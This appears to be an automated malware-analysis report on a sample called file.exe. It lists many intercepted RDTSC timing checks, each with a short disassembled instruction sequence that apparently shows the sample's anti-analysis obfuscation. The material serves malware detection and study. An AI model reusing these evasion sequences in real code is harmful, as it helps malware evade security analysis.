                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5EB3 second address: 12D5EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Ch 0x00000007 jmp 00007F849C4F2DA8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5EE1 second address: 12D5EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F849CDA41FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D6021 second address: 12D605B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F849C4F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007F849C4F2DA5h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F849C4F2DA3h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D62D1 second address: 12D62FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d jo 00007F849CDA41FEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFBA6 second address: 12DFBAC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE5E second address: 12DFE8D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F849CDA41F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F849CDA4202h 0x00000012 jmp 00007F849CDA41FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE8D second address: 12DFE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFE92 second address: 12DFEC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CDA4207h 0x00000009 jmp 00007F849CDA4209h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFEC6 second address: 12DFEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F849C4F2DA4h 0x00000014 je 00007F849C4F2D96h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFEFE second address: 12DFF0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F849CDA41F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF0C second address: 12DFF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF10 second address: 12DFF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF14 second address: 12DFF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF1A second address: 12DFF20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DFF20 second address: 12DFF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F849C4F2D96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E00AE second address: 12E00B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0380 second address: 12E0384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0384 second address: 12E03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E03A0 second address: 12E03B0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F849C4F2DA2h 0x00000008 jbe 00007F849C4F2D96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E03B0 second address: 12E03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F849CDA41FBh 0x0000000b jo 00007F849CDA41F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0519 second address: 12E051D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E051D second address: 12E0527 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0527 second address: 12E052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E052B second address: 12E052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E084D second address: 12E0857 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F849C4F2D9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0857 second address: 12E087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F849CDA4204h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E0DEA second address: 12E0E09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F849C4F2D9Eh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3F4F second address: 12E3F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3F53 second address: 12E3F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4081 second address: 12E4085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4085 second address: 12E408B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E408B second address: 12E4091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6466 second address: 12E647F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2D9Ch 0x00000007 ja 00007F849C4F2D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB5D5 second address: 12EB5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F849CDA41F6h 0x0000000a popad 0x0000000b jmp 00007F849CDA4203h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA898 second address: 12EA8B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F849C4F2DA0h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA8B1 second address: 12EA8B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA8B7 second address: 12EA8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA8BB second address: 12EA8C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAA66 second address: 12EAA80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F849C4F2DA3h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABEB second address: 12EABF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EABF1 second address: 12EAC1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F849C4F2D98h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAC1D second address: 12EAC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAFE7 second address: 12EAFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAFEB second address: 12EAFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EAFEF second address: 12EAFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F849C4F2D9Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB188 second address: 12EB199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jng 00007F849CDA41F6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB199 second address: 12EB19F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EB19F second address: 12EB1B6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F849CDA41F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jc 00007F849CDA41F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE185 second address: 12EE18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EE18B second address: 12EE198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F849CDA41F6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4E23 second address: 12F4E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F849C4F2DA7h 0x0000000a jmp 00007F849C4F2DA4h 0x0000000f popad 0x00000010 jl 00007F849C4F2DA2h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F37E8 second address: 12F37F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F37F6 second address: 12F37FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F37FB second address: 12F380A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 jc 00007F849CDA41FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F380A second address: 12F3830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F849C4F2DA6h 0x0000000d jl 00007F849C4F2D98h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3830 second address: 12F3837 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3965 second address: 12F397E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F849C4F2D9Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F2F second address: 1299F3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F3D second address: 1299F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F41 second address: 1299F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1299F47 second address: 1299FE9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F849C4F2DA1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc dx, F44Dh 0x00000010 mov ebx, dword ptr [ebp+1247AF14h] 0x00000016 add edx, dword ptr [ebp+122D1980h] 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F849C4F2D98h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 add cl, 00000001h 0x0000003b push eax 0x0000003c jns 00007F849C4F2DACh 0x00000042 mov dword ptr [esp], eax 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F849C4F2D98h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f mov dword ptr [ebp+122D26DDh], esi 0x00000065 push 00000004h 0x00000067 mov edx, dword ptr [ebp+122D19FEh] 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 pop edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3EFB second address: 12F3F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4202h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F849CDA4206h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F4071 second address: 12F4075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB1EB second address: 12FB1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB1EF second address: 12FB1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB1F7 second address: 12FB1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBBD9 second address: 12FBBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FBBDF second address: 12FBBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnl 00007F849CDA41F6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4D0 second address: 12FC4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4D8 second address: 12FC4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4E1 second address: 12FC4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC4E5 second address: 12FC501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA41FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F849CDA41F6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC501 second address: 12FC51C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849C4F2D9Fh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC51C second address: 12FC522 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FC522 second address: 12FC537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F849C4F2D9Ch 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FCABC second address: 12FCAD6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F849CDA4204h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FCAD6 second address: 12FCADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301A85 second address: 1301AB4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F849CDA41FCh 0x00000008 jnc 00007F849CDA41F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 jnl 00007F849CDA41F6h 0x00000018 pop edx 0x00000019 push eax 0x0000001a jmp 00007F849CDA4203h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B41 second address: 1305B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B47 second address: 1305B62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849CDA4207h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B62 second address: 1305B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F849C4F2D9Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B72 second address: 1305B8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F849CDA4203h 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B8A second address: 1305B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F849C4F2D96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305B9C second address: 1305BA7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304CC7 second address: 1304CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1304CD0 second address: 1304CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1304CD4 second address: 1304CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1304CDA second address: 1304CF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F849CDA4204h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1305130 second address: 1305140 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F849C4F2DA2h 0x00000008 jne 00007F849C4F2D96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13053E2 second address: 13053FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F849CDA4206h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130556B second address: 1305570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130585C second address: 1305863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1305863 second address: 1305875 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F849C4F2D98h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007F849C4F2DB1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130BDDF second address: 130BDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA41FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130BF14 second address: 130BF1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130BF1C second address: 130BF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
